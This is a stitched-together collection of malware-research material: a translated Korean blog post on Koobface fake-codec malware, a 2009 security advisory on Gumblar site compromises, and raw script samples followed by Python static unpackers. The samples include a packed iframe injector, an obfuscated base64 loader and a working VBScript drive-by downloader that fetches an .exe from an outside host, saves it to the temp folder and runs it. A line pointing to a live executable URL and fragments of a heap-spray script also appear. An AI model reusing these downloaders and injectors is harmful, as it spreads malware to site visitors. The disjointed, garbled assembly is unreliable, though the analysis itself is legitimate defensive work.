I wonder what kinds of malware will be running rampant next.
Recently it has been things like the Koobface-related worm, or the fake antivirus and the fake codec malware (disguised, if you can call it that) described in Hummingbird's blog post (http://hummingbird.tistory.com/1573)...
Will codecs become the dominant trend next year??
Just an idle thought.
What do you all think?
^^;;
#BLACKLABEL RESET UPDATE|http://inartdesigns.com/.sys/?getexe=ms.24.exe EXIT MD5|9f0c7d4916360cd4bc489270f5d62087
#BLACKLABEL
This morning I saw the post below.
http://blog.ahnlab.com/asec/176?TSSESSIONblogahnlabcom=67765c093a27d0b62777426c78d3e4c4
It has been an issue for a long time now, but they say this one behaves a little differently from the Koobface seen before..
It was spreading disguised as a codec for YouTube videos: when you click the video it tells you to install Flash Player 10.37, then downloads and runs a Setup.exe file.
Once infected, it creates an ld15.exe file in the system32 folder.
Since this one is said to be a variant, I got hold of the samples that came out earlier.
There were quite a lot of them..(20 -_-;;)
I just ran all of them without a second look.
They created a lot of files..
The difference from this one is that they were creating files in the C:\WINDOWS folder rather than in system32.
Searching a little further, I found that Trend Micro has some good analysis material..
First, let's look at the Koobface worm's operation diagram(?)..
[Figure: Koobface worm operation diagram]
Source: http://blog.trendmicro.com/the-real-face-of-koobface/
What a remarkable piece of work....was my thought.
When I have time, I'll analyze the samples I obtained one by one.
(Really....finish the fake rar one first...-_-;;;;)
Finally, here is the Koobface analysis report taken from Trend Micro.
It looks like good, quite detailed material, so I'm attaching it.
[Reference blogs]
http://hummingbird.tistory.com/1049
http://viruslab.tistory.com/689
http://blog.ahnlab.com/asec/162 [added]
Posted by John Kuhn and Ryan McNulty with a little help from Holly Stewart on October 19, 2009 at 4:12 PM EDT.
Gumblar is back, and it has an upgraded arsenal of exploits to compromise your browser, Office, and Adobe® products.
Here in Managed Security Services, we’ve noticed a considerable elevation in our global hits on malicious PDF files. More specifically, the signature used to detect the latest Adobe Reader Remote Code Execution has picked up most of the activity. Here's a graph of the attacks we’re seeing:
The event count on Oct 19 ended at over a thousand events, five times the normal event count for this kind of malicious PDF and nearly doubling the kind of attack activity we've seen in the past.
Upon reviewing the data, it became very apparent that the sites hosting the malicious files were legitimate websites (privately owned and operated). All of these websites have been compromised and are now indiscriminately serving the malicious payload to countless victims.
In the past, Gumblar has been known to use stolen FTP password credentials to compromise its victims’ websites. We can only guess that these compromises were no different. As website visitors get infected, they (unknowingly) are farmed for any FTP credentials, seemingly providing the Gumblar controllers with an endless supply of future websites they can compromise.
So what’s different this time around? In previous versions of Gumblar, the malicious scripts and payload were hosted on a remote server. Iframe code was injected into the compromised website, and it redirected visitors to their rogue server (gumblar.cn). This time around, they are placing the malicious scripts and payload directly on the compromised host, which gives them a decentralized and redundant attack vector, spread across thousands of legitimate websites around the world.
The uploaded scripts are placed carefully to match existing file structures currently on the websites. Heavy obfuscation is used in an attempt to evade some existing security measures.
Here's a snippet of the obfuscated malicious script:
Some of the attack vectors have also changed. Today, we see the following exploits in play:
All of these attacks are very recent and effective at compromising the client-side victim in an effort to propagate their malicious payload worldwide. Coverage for the updated Trojan is still very low according to an analysis done through VirusTotal.
Your best means of protection is to use protections provided by your IPS/IDS device and to apply the latest patches for all of the affected applications, if you haven’t already done so.
Gumblar is a force to be reckoned with, and this latest push of theirs is a true testament to that fact. As always, we’ll do our best to keep you informed of its changes and activities here.
Change History
Tue, Oct 20, 2009: Updated the chart to reflect the event count total at the end of Monday.
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7.8("<1 5=4://2.3.6.9/d./e.c b=0 a=0></1>");',15,15,'|iframe|xxx|yyy|http|src||document|write|zzz|height|width|asp|t|Main'.split('|'),0,{}))
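The snippet above is the common p,a,c,k,e,d packer: `p` is the script with every identifier replaced by its index in `k`, written in base `a`. An analyst does not need to run it; the word table can be rebuilt statically. The following Python unpacker is an added example, not code from the page or from any of the quoted blogs; the `PACKED` constant reproduces only the packer's arguments from the snippet (the function body is replaced by a comment) with the hostname labels as the page already anonymised them, and `iframe_sources` is a hypothetical helper that pulls the injected iframe URL out of the result for blocklisting.

```python
import re

# Constructed input: the argument list of the page's packed snippet, with the
# packer function body elided (the unpacker only needs the four arguments).
PACKED = ("eval(function(p,a,c,k,e,d){/* packer body */return p}("
          "'7.8(\"<1 5=4://2.3.6.9/d./e.c b=0 a=0></1>\");',15,15,"
          "'|iframe|xxx|yyy|http|src||document|write|zzz|height|width|asp|t|Main'"
          ".split('|'),0,{}))")

ARGS = re.compile(r"\}\('(.*?)',\s*(\d+),\s*(\d+),\s*'(.*?)'\.split\('\|'\)", re.S)
DIGITS = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"


def encode_word(n: int, a: int) -> str:
    """Packer's word encoding: n written in base a.

    Generalises the page's c.toString(36) variant to the standard packer,
    which uses A-Z for digits 36..61 when the radix exceeds 36.
    """
    out = ""
    while True:
        n, d = divmod(n, a)
        out = DIGITS[d] + out
        if n == 0:
            return out


def unpack(packed: str) -> str:
    """Rebuild the word table and substitute it into p, without eval."""
    m = ARGS.search(packed)
    if not m:
        raise ValueError("not a p,a,c,k,e,d packed script")
    p, a, c, k = m.group(1), int(m.group(2)), int(m.group(3)), m.group(4).split("|")
    p = p.replace('\\"', '"').replace("\\\\", "\\")  # undo JS string escapes
    # Empty k entries (k[c]||...) mean "keep the word as written".
    table = {encode_word(i, a): k[i] for i in range(min(c, len(k))) if k[i]}
    return re.sub(r"\b\w+\b", lambda w: table.get(w.group(0), w.group(0)), p)


def iframe_sources(html: str) -> list:
    """Hypothetical helper: URLs injected via <iframe src=...> in the output."""
    return re.findall(r"<iframe[^>]*\bsrc=[\"']?([^\s\"'>]+)", html, re.I)


if __name__ == "__main__":
    decoded = unpack(PACKED)
    print(decoded)
    print(iframe_sources(decoded))
```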
<SCRIPT> document.write("<iframe width=50 height=0 src=ad.htm></iframe>"); document.write("<iframe width=100 height=0 src=index.htm></iframe>"); window.status="供냥"; window.onerror=function(){return true;} </SCRIPT> </HEAD> </HTML>
<script type="text/jscript"> function init() { document.write(""); } window.onload = init; </script> <script> var a1 = "ABCDEFG"; var a2 = "HIJKLMNOP"; var a3 = "QRSTUVWXYZabcdef"; var keyStrs = a1+a2+a3+"ghijklmnopqrstuv"+"wxyz0123456789+/"+"="; function mydata(input){ var output=""; var chr1,chr2,chr3=""; var enc1,enc2,enc3,enc4=""; var i=0; var base64test=/[^A-Za-z0-9\+\/\=]/g; input=input.replace(/[^A-Za-z0-9\+\/\=]/g,""); do{ enc1=keyStrs.indexOf(input.charAt(i++)); enc2=keyStrs.indexOf(input.charAt(i++)); enc3=keyStrs.indexOf(input.charAt(i++)); enc4=keyStrs.indexOf(input.charAt(i++)); chr1=(enc1<<2)|(enc2>>4); chr2=((enc2&15)<<4)|(enc3>>2); chr3=((enc3&3)<<6)|enc4; output=output+String.fromCharCode(chr1); if(enc3!=64){output=output+String.fromCharCode(chr2);}; if(enc4!=64){output=output+String.fromCharCode(chr3);}; chr1=chr2=chr3=""; enc1=enc2=enc3=enc4=""; }; while(i<input.length);return output; }; t="43 + 37 ,107 - 36 ,9880 / 95 ,64 - 16 ,117 - 19 ,141 - 54 ,8211 / 69 ,9 + 34 ,884 / 13 ,97 - 16 ,153 - 42 ,38 + 18 ,75 + 24 ,350 / 7 ,5772 / 74 ,2057 / 17 ,0 + 97 ,70 + 18 ,3498 / 53 ,3 + 45 ,3358 / 46 ,16 + 55 ,137 - 17 ,90 + 14 ,174 - 76 ,153 - 44 ,167 - 67 ,1715 / 35 ,3204 / 36 ,4437 / 51 ,42 + 58 ,8856 / 82 ,51 + 29 ,3320 / 40 ,109 - 35 ,75 + 12 ,157 - 76 ,3348 / 31 ,113 - 35 ,64 + 42 ,172 - 73 ,4360 / 40 ,54 + 54 ,156 - 37 ,9200 / 92 ,1139 / 17 ,29 + 44 ,46 - 3 ,4420 / 65 ,72 + 9 ,6 + 106 ,179 - 61 ,1372 / 14 ,10395 / 99 ,52 + 14 ,196 - 88 ,... 
[omitted] ...,13 + 90 ,51 + 39 ,10 + 99 ,102 - 49 ,187 - 83 ,1666 / 17 ,9 + 78 ,4760 / 56 ,30 + 90 ,94 - 18 ,670 / 10 ,102 - 29 ,4200 / 40 ,44 + 32 ,1675 / 25 ,56 + 17 ,111 - 6 ,30 + 46 ,4154 / 62 ,58 + 16 ,4720 / 40 ,94 + 5 ,83 - 12 ,4420 / 52 ,10185 / 97 ,3922 / 53 ,210 - 105 ,146 - 72 ,35 + 82 ,67 + 6 ,205 - 100 ,156 - 37 ,13447 / 113 ,4420 / 65 ,2754 / 34 ,174 - 63 ,1680 / 30 ,1 + 75 ,816 / 16 ,31 + 47 ,152 - 46 ,127 - 28 ,65 + 44 ,195 - 87 ,195 - 76 ,1700 / 17 ,55 + 13 ,22 + 30 ,84 - 23 "; t=eval("mydata(String.fromCharCode("+t+"))"); document.write(t); </script>
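The script above hides its payload behind two layers: `t` is a list of small arithmetic expressions that `eval` turns into character codes, and the resulting string is fed to `mydata()`, which is nothing more than a standard base64 decoder with non-alphabet characters stripped. Both layers can be replayed with integer arithmetic and no `eval`. The decoder below is an added example, not the page's code; `SAMPLE_T` is a constructed token string in the same shape (the page's own data is elided), and it decodes to the harmless string `<b>x</b>`.

```python
import base64
import re

# Constructed sample in the shape of the page's t string: every token is an
# integer expression whose value is one character code of a base64 string.
# It encodes "PGI+eDwvYj4=", i.e. "<b>x</b>", not the page's (elided) data.
SAMPLE_T = ("40 + 40 ,142 - 71 ,365 / 5 ,3 + 40 ,202 / 2 ,100 - 32 ,"
            "17 + 102 ,236 / 2 ,100 - 11 ,50 + 56 ,60 - 8 ,122 / 2")

TOKEN = re.compile(r"^\s*(\d+)\s*([+\-/])\s*(\d+)\s*$")
B64_JUNK = re.compile(r"[^A-Za-z0-9+/=]")  # the class mydata() strips


def eval_token(tok: str) -> int:
    """Evaluate one 'a op b' token with integer arithmetic, no eval()."""
    m = TOKEN.match(tok)
    if not m:
        raise ValueError(f"unexpected token: {tok!r}")
    a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
    if op == "+":
        return a + b
    if op == "-":
        return a - b
    # The sample's divisions are all exact; anything else is not a char code.
    if b == 0 or a % b:
        raise ValueError(f"non-integer character code from {tok!r}")
    return a // b


def decode_t(t: str) -> str:
    """Replay String.fromCharCode(...) and then mydata() statically."""
    codes = [eval_token(tok) for tok in t.split(",")]
    if any(c < 0 or c > 0x10FFFF for c in codes):
        raise ValueError("character code out of range")
    b64 = B64_JUNK.sub("", "".join(map(chr, codes)))
    # mydata() builds its output byte by byte with fromCharCode, so the
    # decoded bytes map to text as latin-1; this is what document.write() gets.
    return base64.b64decode(b64, validate=True).decode("latin-1")


if __name__ == "__main__":
    print(decode_t(SAMPLE_T))
```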
<html> <script language="VBScript"> on error resume next dl = "http://www.xxxxxxxx.co.kr/data/msn.exe" Set df = document.createElement("ob"&"ject") df.setAttribute "classid", "clsid:BD96C55"&"6-65A3-11D0-983A-00C04FC29E36" str="Microsoft"&".XMLHTTP" Set x = df.CreateObject(str,"") a1="Ado" a2="db." a3="Str"&"ea" str1=a1&a2&a3 str5=str1 set S = df.createobject(str5&"m","") S.type = 1 str6="G"&"ET" x.Open str6, dl, False x.Send fname1="g0ld"&".com" set F = df.createobject("Scripti"&"ng.FilesystemObject","") set tmp = F.GetSpecialFolder(2) S.open fname1= F.BuildPath(tmp,fname1) S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject("Shell.Ap"&"plication","") Q.ShellExecute fname1,"","","ope"&"n",0 </script>
<html> <body> <div id="DivID"> <script src='he1.swf'></script> <script src='he3.swf'> </script> <script src='he2.swf'></script> </body> </html>
var XXXxxyt='0'; var slacksace=headersize+ytshell.length; while(omybro.length<slacksace)
[Figure: pcap file layout: Global Header, followed by repeating Packet Header / Packet Data records ...]